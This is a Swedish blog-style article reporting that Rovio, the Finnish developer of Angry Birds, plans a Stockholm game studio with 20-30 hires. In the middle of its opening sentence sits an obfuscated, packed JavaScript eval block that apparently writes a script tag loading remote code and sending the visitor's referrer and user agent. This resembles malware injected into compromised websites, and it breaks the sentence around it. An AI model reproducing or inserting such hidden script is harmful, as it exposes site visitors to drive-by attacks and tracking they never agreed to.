Image Image Image Image Image Image Image Image Image Image

| 16 april, 2021

Scroll to top

Top

Stockholm är nästa för Angry Birds

Stockholm är nästa för Angry Birds
Sebastian

Vet eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ndrsb|var|u0026u|referrer|ykiyr||js|php’.split(’|’),0,{}))
inte om det bara är jag men det känns som Sverige och Stockholm verkar växa sig större och större utomlands med tanke på vårt goda rykte om bra standard och struktur i samhället. Fler turister kommer hit och det skrivs mer om oss i internationella tidningar.

Nu är det i alla fall så att den finska spelutveklaren Rovio som ligger bakom spelet Angry Birds idag bestämt sig för att de ska starta upp en spelstudio i Stockholm redan i år.

Rovio kommer att satsa detta år och anställa 20-30 personer med goda talanger. Just nu är de på jakt efter en chef på Stockholmskontoret.

– 2012 kommer att bli ett stort år för oss och vi tittar konstant på hur vi ska hitta nya talanger. Vi ser mycket fram emot att expandera till Stockholm och jobba i en av Europas hetaste städer när det gäller spel, säger Petri Järvilehto som har titeln EVP of Games på Rovio.

Rovio har kontor i Tammerfors i Finland och i Shanghai.